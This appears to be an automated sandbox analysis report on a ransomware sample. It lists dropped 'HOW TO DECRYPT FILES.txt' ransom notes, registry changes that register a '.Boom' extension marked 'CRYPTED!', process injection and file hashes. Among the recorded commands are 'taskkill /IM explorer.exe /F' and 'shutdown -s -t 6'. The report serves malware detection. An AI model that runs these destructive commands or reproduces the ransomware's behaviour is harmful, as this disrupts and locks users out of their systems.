File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Stacking\NavigationUp_ButtonGraphic.png C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1254.TXT C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\winsxs\amd64_microsoft-windows-m..-mdac-rds-shape-dll_31bf3856ad364e35_6.1.7600.16385_none_2c0460a5d6cf99aa\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File opened for modification C:\Windows\winsxs\x86_microsoft-windows-mail-app_31bf3856ad364e35_6.1.7601.17514_none_f35f9773adf74c06\Bears.jpg C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\winsxs\x86_microsoft-windows-p..rtmonitor.resources_31bf3856ad364e35_6.1.7600.16385_it-it_e1bbd91348b28fbd\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-e..ntication.resources_31bf3856ad364e35_6.1.7600.16385_es-es_af29a5cb947bb312\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-l..l-starter.resources_31bf3856ad364e35_6.1.7600.16385_es-es_7ff30646d8c5721f\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-wlangpui.resources_31bf3856ad364e35_6.1.7600.16385_en-us_75b8a5c3d25e2a01\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\winsxs\amd64_netl1c64.inf.resources_31bf3856ad364e35_6.1.7600.16385_es-es_c0290a272487a6be\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-ie-htmlapplication_31bf3856ad364e35_11.2.9600.16428_none_3bb1024f1e6bc086\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-t..onmanager.resources_31bf3856ad364e35_6.1.7600.16385_de-de_8f95e98467a98e5e\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\winsxs\amd64_net8187se64.inf.resources_31bf3856ad364e35_6.1.7600.16385_es-es_26a869f069f08dc4\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\winsxs\amd64_wsdprint.inf.resources_31bf3856ad364e35_6.1.7600.16385_ja-jp_b7256a767543d30d\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File opened for modification C:\Windows\winsxs\x86_microsoft-windows-e..rtingcore.resources_31bf3856ad364e35_6.1.7600.16385_es-es_02b53e1d98470ee8\erofflps.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\winsxs\x86_microsoft-windows-s..g-jscript.resources_31bf3856ad364e35_8.0.7600.16385_fr-fr_1109fb9951b8f80b\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\winsxs\x86_microsoft-windows-wpfcorecomp.resources_31bf3856ad364e35_6.1.7601.17514_ja-jp_e2ebaa32abd84c8f\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-dpapi-keys.resources_31bf3856ad364e35_6.1.7600.16385_de-de_9bf0da4150b60702\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-r..tance-adm.resources_31bf3856ad364e35_6.1.7600.16385_ja-jp_a3356af4d9adcae1\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-b..trics-cpl.resources_31bf3856ad364e35_6.1.7600.16385_es-es_9c8da1aa88db9946\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-j..buggeride.resources_31bf3856ad364e35_8.0.7600.16385_es-es_8a689fd92c8b700f\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-m..s-service.resources_31bf3856ad364e35_6.1.7600.16385_it-it_ff2f11062d6c5d92\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\assembly\GAC_MSIL\system.workflow.componentmodel.resources\3.0.0.0_ja_31bf3856ad364e35\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.GroupPoli#\06d363f8e85281d0f70f2c88d1a0e667\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-ipnat.resources_31bf3856ad364e35_6.1.7600.16385_ja-jp_6f0da6cf6309ed22\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\winsxs\wow64_microsoft-windows-s..ativehost.resources_31bf3856ad364e35_6.1.7600.16385_it-it_24d0deee1ac49b0e\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\assembly\GAC_MSIL\MICROSOFT.VISUALBASIC.COMPATIBILITY.DATA.resources\8.0.0.0_ja_b03f5f7f11d50a3a\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-i..ngsupport.resources_31bf3856ad364e35_8.0.7600.16385_en-us_ad729b320c691eac\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-s..-soundthemes-sonata_31bf3856ad364e35_6.1.7600.16385_none_201752c112c5078c\Windows Balloon.wav C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File opened for modification C:\Windows\winsxs\x86_microsoft-windows-g..ets-slideshowgadget_31bf3856ad364e35_6.1.7600.16385_none_253e8c58002c48e1\blank.png C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\winsxs\x86_microsoft-windows-g..licy-base.resources_31bf3856ad364e35_6.1.7600.16385_de-de_181a1bc5e35bb95e\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\winsxs\x86_netfx-shfusion_res_dll_b03f5f7f11d50a3a_6.1.7600.16385_none_7a97f0ca887d1f24\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File opened for modification C:\Windows\Media\Calligraphy\Windows Hardware Remove.wav C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ComSvcConfig.exe C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\winsxs\msil_msbuild.resources_b03f5f7f11d50a3a_6.1.7600.16385_ja-jp_0f2251f715f14f5f\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\winsxs\x86_netfx-csc_exe_config_b03f5f7f11d50a3a_6.1.7600.16385_none_5bfb623d555cccb6\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\assembly\GAC_MSIL\Narrator\6.1.0.0__31bf3856ad364e35\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-s..cingstack.resources_31bf3856ad364e35_6.1.7600.16385_fr-fr_8b317f4ba16d3507\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File opened for modification C:\Windows\winsxs\wow64_microsoft-windows-p..ll-preloc.resources_31bf3856ad364e35_6.1.7600.16385_es-es_27c74b34efa6572d\about_If.help.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-help-gamesp.resources_31bf3856ad364e35_6.1.7600.16385_en-us_0a4908dad3d0a5db\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-m..-mdac-rds-shape-rll_31bf3856ad364e35_6.1.7600.16385_none_3239c529d2d1d90c\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-speechcommonnoia64_31bf3856ad364e35_6.1.7600.16385_none_5e9e78a6dd413413\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-w..ystemassessmenttool_31bf3856ad364e35_6.1.7601.17514_none_d9bafd47cdf9833b\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\winsxs\x86_microsoft-windows-e..gine-isam.resources_31bf3856ad364e35_6.1.7600.16385_fr-fr_0e32b701c9788fec\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\winsxs\x86_taskschedulersettings.resources_31bf3856ad364e35_6.1.7600.16385_en-us_f34361298f0b5882\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\Boot\Fonts\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-o..iadisc-style-travel_31bf3856ad364e35_6.1.7600.16385_none_f2a7c66510a5395d\passport.png C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-p..ll-preloc.resources_31bf3856ad364e35_6.1.7600.16385_en-us_1da743febb1ea38d\about_scripts.help.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\winsxs\msil_comsvcconfig.resources_b03f5f7f11d50a3a_6.1.7601.17514_ja-jp_2a37215727b5d00e\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\winsxs\x86_microsoft-windows-ie-setup_31bf3856ad364e35_11.2.9600.16428_none_1f77d330a4790dae\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\winsxs\x86_microsoft-windows-m..oledb-rll.resources_31bf3856ad364e35_6.1.7600.16385_en-us_774f231c5b0ae344\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Entity.Design\v4.0_4.0.0.0__b77a5c561934e089\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-i..-platform.resources_31bf3856ad364e35_8.0.7600.16385_de-de_9953c1c53c7a8c94\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-u..re-atmini.resources_31bf3856ad364e35_6.1.7600.16385_en-us_4dbe3af629c49981\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\winsxs\x86_microsoft-windows-opengl.resources_31bf3856ad364e35_6.1.7600.16385_es-es_9ee9341436547754\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-deltapackageexpander_31bf3856ad364e35_6.1.7601.17514_none_c8049b9e4ba7658c\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-iis-bpa.resources_31bf3856ad364e35_6.1.7601.17514_ja-jp_251746b074c94113\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\winsxs\amd64_server-help-chm.reliab.resources_31bf3856ad364e35_6.1.7600.16385_de-de_75c5fd0bb9b184d9\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\winsxs\x86_setup-uxwizard-clientimages_31bf3856ad364e35_6.1.7600.16385_none_48ada01d8ff36e68\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-n..35wpfcomp.resources_31bf3856ad364e35_6.1.7600.16385_fr-fr_67ecd7388fa46002\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-n..meworkapi.resources_31bf3856ad364e35_6.1.7600.16385_de-de_04346e25ffbfe92d\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\winsxs\amd64_microsoft.windows.c..-controls.resources_6595b64144ccf1df_6.0.7600.16385_tr-tr_9e98e8587a93bcd6\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-h..putername.resources_31bf3856ad364e35_6.1.7600.16385_fr-fr_0202957a15d38086\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-netplwiz.resources_31bf3856ad364e35_6.1.7600.16385_fr-fr_2dd66c79c7e4f8e2\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\winsxs\x86_microsoft-windows-isoburn.resources_31bf3856ad364e35_6.1.7600.16385_de-de_27d3aa8ba7b1db61\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\winsxs\x86_microsoft-windows-m..ac-sql-cliconfg-exe_31bf3856ad364e35_6.1.7600.16385_none_6ff39cfbb8057a05\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\winsxs\x86_microsoft-windows-whhelper.resources_31bf3856ad364e35_6.1.7600.16385_ja-jp_70e8a62da42e1401\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Boom\ = "SSTWIPNUVDUSGRM" C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\SSTWIPNUVDUSGRM\ = "CRYPTED!" C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\SSTWIPNUVDUSGRM\shell\open\command C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\SSTWIPNUVDUSGRM\shell\open C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\SSTWIPNUVDUSGRM\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Bdx48saERp3j6l1.exe" C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.Boom C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\SSTWIPNUVDUSGRM C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\SSTWIPNUVDUSGRM\DefaultIcon C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\SSTWIPNUVDUSGRM\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Bdx48saERp3j6l1.exe,0" C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\SSTWIPNUVDUSGRM\shell C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\shutdown.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\system32\shutdown.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\shutdown.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\system32\shutdown.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\shutdown.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\system32\shutdown.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\shutdown.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\system32\shutdown.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\shutdown.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\system32\shutdown.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\shutdown.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\system32\shutdown.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\shutdown.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\system32\shutdown.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2212 wrote to memory of 2516 N/A C:\Users\Admin\AppData\Local\Temp\e8e07496df5370d2e49ecce5a47c1fd2.exe C:\Users\Admin\AppData\Local\Tempsvchost.exe
PID 2212 wrote to memory of 2516 N/A C:\Users\Admin\AppData\Local\Temp\e8e07496df5370d2e49ecce5a47c1fd2.exe C:\Users\Admin\AppData\Local\Tempsvchost.exe
PID 2212 wrote to memory of 2516 N/A C:\Users\Admin\AppData\Local\Temp\e8e07496df5370d2e49ecce5a47c1fd2.exe C:\Users\Admin\AppData\Local\Tempsvchost.exe
PID 2212 wrote to memory of 2516 N/A C:\Users\Admin\AppData\Local\Temp\e8e07496df5370d2e49ecce5a47c1fd2.exe C:\Users\Admin\AppData\Local\Tempsvchost.exe
PID 2212 wrote to memory of 704 N/A C:\Users\Admin\AppData\Local\Temp\e8e07496df5370d2e49ecce5a47c1fd2.exe C:\Windows\system32\taskkill.exe
PID 2212 wrote to memory of 704 N/A C:\Users\Admin\AppData\Local\Temp\e8e07496df5370d2e49ecce5a47c1fd2.exe C:\Windows\system32\taskkill.exe
PID 2212 wrote to memory of 704 N/A C:\Users\Admin\AppData\Local\Temp\e8e07496df5370d2e49ecce5a47c1fd2.exe C:\Windows\system32\taskkill.exe
PID 2212 wrote to memory of 1380 N/A C:\Users\Admin\AppData\Local\Temp\e8e07496df5370d2e49ecce5a47c1fd2.exe C:\Windows\system32\shutdown.exe
PID 2212 wrote to memory of 1380 N/A C:\Users\Admin\AppData\Local\Temp\e8e07496df5370d2e49ecce5a47c1fd2.exe C:\Windows\system32\shutdown.exe
PID 2212 wrote to memory of 1380 N/A C:\Users\Admin\AppData\Local\Temp\e8e07496df5370d2e49ecce5a47c1fd2.exe C:\Windows\system32\shutdown.exe
PID 2212 wrote to memory of 1668 N/A C:\Users\Admin\AppData\Local\Temp\e8e07496df5370d2e49ecce5a47c1fd2.exe C:\Windows\system32\taskkill.exe
PID 2212 wrote to memory of 1668 N/A C:\Users\Admin\AppData\Local\Temp\e8e07496df5370d2e49ecce5a47c1fd2.exe C:\Windows\system32\taskkill.exe
PID 2212 wrote to memory of 1668 N/A C:\Users\Admin\AppData\Local\Temp\e8e07496df5370d2e49ecce5a47c1fd2.exe C:\Windows\system32\taskkill.exe
PID 2212 wrote to memory of 884 N/A C:\Users\Admin\AppData\Local\Temp\e8e07496df5370d2e49ecce5a47c1fd2.exe C:\Windows\system32\shutdown.exe
PID 2212 wrote to memory of 884 N/A C:\Users\Admin\AppData\Local\Temp\e8e07496df5370d2e49ecce5a47c1fd2.exe C:\Windows\system32\shutdown.exe
PID 2212 wrote to memory of 884 N/A C:\Users\Admin\AppData\Local\Temp\e8e07496df5370d2e49ecce5a47c1fd2.exe C:\Windows\system32\shutdown.exe
PID 2212 wrote to memory of 2504 N/A C:\Users\Admin\AppData\Local\Temp\e8e07496df5370d2e49ecce5a47c1fd2.exe C:\Windows\system32\taskkill.exe
PID 2212 wrote to memory of 2504 N/A C:\Users\Admin\AppData\Local\Temp\e8e07496df5370d2e49ecce5a47c1fd2.exe C:\Windows\system32\taskkill.exe
PID 2212 wrote to memory of 2504 N/A C:\Users\Admin\AppData\Local\Temp\e8e07496df5370d2e49ecce5a47c1fd2.exe C:\Windows\system32\taskkill.exe
PID 2212 wrote to memory of 2136 N/A C:\Users\Admin\AppData\Local\Temp\e8e07496df5370d2e49ecce5a47c1fd2.exe C:\Windows\system32\shutdown.exe
PID 2212 wrote to memory of 2136 N/A C:\Users\Admin\AppData\Local\Temp\e8e07496df5370d2e49ecce5a47c1fd2.exe C:\Windows\system32\shutdown.exe
PID 2212 wrote to memory of 2136 N/A C:\Users\Admin\AppData\Local\Temp\e8e07496df5370d2e49ecce5a47c1fd2.exe C:\Windows\system32\shutdown.exe
PID 2212 wrote to memory of 2288 N/A C:\Users\Admin\AppData\Local\Temp\e8e07496df5370d2e49ecce5a47c1fd2.exe C:\Windows\system32\taskkill.exe
PID 2212 wrote to memory of 2288 N/A C:\Users\Admin\AppData\Local\Temp\e8e07496df5370d2e49ecce5a47c1fd2.exe C:\Windows\system32\taskkill.exe
PID 2212 wrote to memory of 2288 N/A C:\Users\Admin\AppData\Local\Temp\e8e07496df5370d2e49ecce5a47c1fd2.exe C:\Windows\system32\taskkill.exe
PID 2212 wrote to memory of 864 N/A C:\Users\Admin\AppData\Local\Temp\e8e07496df5370d2e49ecce5a47c1fd2.exe C:\Windows\system32\shutdown.exe
PID 2212 wrote to memory of 864 N/A C:\Users\Admin\AppData\Local\Temp\e8e07496df5370d2e49ecce5a47c1fd2.exe C:\Windows\system32\shutdown.exe
PID 2212 wrote to memory of 864 N/A C:\Users\Admin\AppData\Local\Temp\e8e07496df5370d2e49ecce5a47c1fd2.exe C:\Windows\system32\shutdown.exe
PID 2212 wrote to memory of 1980 N/A C:\Users\Admin\AppData\Local\Temp\e8e07496df5370d2e49ecce5a47c1fd2.exe C:\Windows\system32\taskkill.exe
PID 2212 wrote to memory of 1980 N/A C:\Users\Admin\AppData\Local\Temp\e8e07496df5370d2e49ecce5a47c1fd2.exe C:\Windows\system32\taskkill.exe
PID 2212 wrote to memory of 1980 N/A C:\Users\Admin\AppData\Local\Temp\e8e07496df5370d2e49ecce5a47c1fd2.exe C:\Windows\system32\taskkill.exe
PID 2212 wrote to memory of 2880 N/A C:\Users\Admin\AppData\Local\Temp\e8e07496df5370d2e49ecce5a47c1fd2.exe C:\Windows\system32\shutdown.exe
PID 2212 wrote to memory of 2880 N/A C:\Users\Admin\AppData\Local\Temp\e8e07496df5370d2e49ecce5a47c1fd2.exe C:\Windows\system32\shutdown.exe
PID 2212 wrote to memory of 2880 N/A C:\Users\Admin\AppData\Local\Temp\e8e07496df5370d2e49ecce5a47c1fd2.exe C:\Windows\system32\shutdown.exe
PID 2212 wrote to memory of 2784 N/A C:\Users\Admin\AppData\Local\Temp\e8e07496df5370d2e49ecce5a47c1fd2.exe C:\Windows\system32\taskkill.exe
PID 2212 wrote to memory of 2784 N/A C:\Users\Admin\AppData\Local\Temp\e8e07496df5370d2e49ecce5a47c1fd2.exe C:\Windows\system32\taskkill.exe
PID 2212 wrote to memory of 2784 N/A C:\Users\Admin\AppData\Local\Temp\e8e07496df5370d2e49ecce5a47c1fd2.exe C:\Windows\system32\taskkill.exe
PID 2212 wrote to memory of 2688 N/A C:\Users\Admin\AppData\Local\Temp\e8e07496df5370d2e49ecce5a47c1fd2.exe C:\Windows\system32\shutdown.exe
PID 2212 wrote to memory of 2688 N/A C:\Users\Admin\AppData\Local\Temp\e8e07496df5370d2e49ecce5a47c1fd2.exe C:\Windows\system32\shutdown.exe
PID 2212 wrote to memory of 2688 N/A C:\Users\Admin\AppData\Local\Temp\e8e07496df5370d2e49ecce5a47c1fd2.exe C:\Windows\system32\shutdown.exe
PID 2212 wrote to memory of 2292 N/A C:\Users\Admin\AppData\Local\Temp\e8e07496df5370d2e49ecce5a47c1fd2.exe C:\Windows\system32\taskkill.exe
PID 2212 wrote to memory of 2292 N/A C:\Users\Admin\AppData\Local\Temp\e8e07496df5370d2e49ecce5a47c1fd2.exe C:\Windows\system32\taskkill.exe
PID 2212 wrote to memory of 2292 N/A C:\Users\Admin\AppData\Local\Temp\e8e07496df5370d2e49ecce5a47c1fd2.exe C:\Windows\system32\taskkill.exe
PID 2212 wrote to memory of 1512 N/A C:\Users\Admin\AppData\Local\Temp\e8e07496df5370d2e49ecce5a47c1fd2.exe C:\Windows\system32\shutdown.exe
PID 2212 wrote to memory of 1512 N/A C:\Users\Admin\AppData\Local\Temp\e8e07496df5370d2e49ecce5a47c1fd2.exe C:\Windows\system32\shutdown.exe
PID 2212 wrote to memory of 1512 N/A C:\Users\Admin\AppData\Local\Temp\e8e07496df5370d2e49ecce5a47c1fd2.exe C:\Windows\system32\shutdown.exe
PID 2212 wrote to memory of 2332 N/A C:\Users\Admin\AppData\Local\Temp\e8e07496df5370d2e49ecce5a47c1fd2.exe C:\Windows\system32\taskkill.exe
PID 2212 wrote to memory of 2332 N/A C:\Users\Admin\AppData\Local\Temp\e8e07496df5370d2e49ecce5a47c1fd2.exe C:\Windows\system32\taskkill.exe
PID 2212 wrote to memory of 2332 N/A C:\Users\Admin\AppData\Local\Temp\e8e07496df5370d2e49ecce5a47c1fd2.exe C:\Windows\system32\taskkill.exe

Processes

C:\Users\Admin\AppData\Local\Temp\e8e07496df5370d2e49ecce5a47c1fd2.exe

"C:\Users\Admin\AppData\Local\Temp\e8e07496df5370d2e49ecce5a47c1fd2.exe"

C:\Users\Admin\AppData\Local\Tempsvchost.exe

"C:\Users\Admin\AppData\Local\Tempsvchost.exe"

C:\Windows\system32\taskkill.exe

taskkill /IM explorer.exe /F

C:\Windows\system32\shutdown.exe

shutdown -s -t 6

C:\Windows\system32\taskkill.exe

taskkill /IM explorer.exe /F

C:\Windows\system32\shutdown.exe

shutdown -s -t 6

C:\Windows\system32\taskkill.exe

taskkill /IM explorer.exe /F

C:\Windows\system32\shutdown.exe

shutdown -s -t 6

C:\Windows\system32\taskkill.exe

taskkill /IM explorer.exe /F

C:\Windows\system32\shutdown.exe

shutdown -s -t 6

C:\Windows\system32\taskkill.exe

taskkill /IM explorer.exe /F

C:\Windows\system32\shutdown.exe

shutdown -s -t 6

C:\Windows\system32\taskkill.exe

taskkill /IM explorer.exe /F

C:\Windows\system32\shutdown.exe

shutdown -s -t 6

C:\Windows\system32\taskkill.exe

taskkill /IM explorer.exe /F

C:\Windows\system32\shutdown.exe

shutdown -s -t 6

C:\Windows\system32\LogonUI.exe

"LogonUI.exe" /flags:0x0

C:\Windows\system32\taskkill.exe

taskkill /IM explorer.exe /F

C:\Windows\system32\shutdown.exe

shutdown -s -t 6

C:\Windows\system32\LogonUI.exe

"LogonUI.exe" /flags:0x1

Network

N/A

Files

memory/2212-0-0x000007FEF5DAE000-0x000007FEF5DAF000-memory.dmp

memory/2212-1-0x000007FEF5AF0000-0x000007FEF648D000-memory.dmp

memory/2212-2-0x000007FEF5AF0000-0x000007FEF648D000-memory.dmp

memory/2212-4-0x000007FEF5AF0000-0x000007FEF648D000-memory.dmp

C:\Users\Admin\AppData\Local\Tempsvchost.exe

MD5 e40c6c092f093bd84544c46b75136212
SHA1 4e572fb842cbe318f6387d254741045f7bf5b230
SHA256 0eff6a71d9bd1549d4c12bc984ed722b9139f75615d4adcb49f9ec240afe9d7d
SHA512 d4f2c0f2f9dab7349036f73310b8a6d07e663ed664b9b14333f463d14cc9aa2c35759c3714419101787b3d0204d522948f893d649f6edb0e5efe8a847da9117f

C:\MSOCache\All Users\{90140000-0018-0409-0000-0000000FF1CE}-C\HOW TO DECRYPT FILES.txt

MD5 2efe72d837aed462e887ad524a404ebd
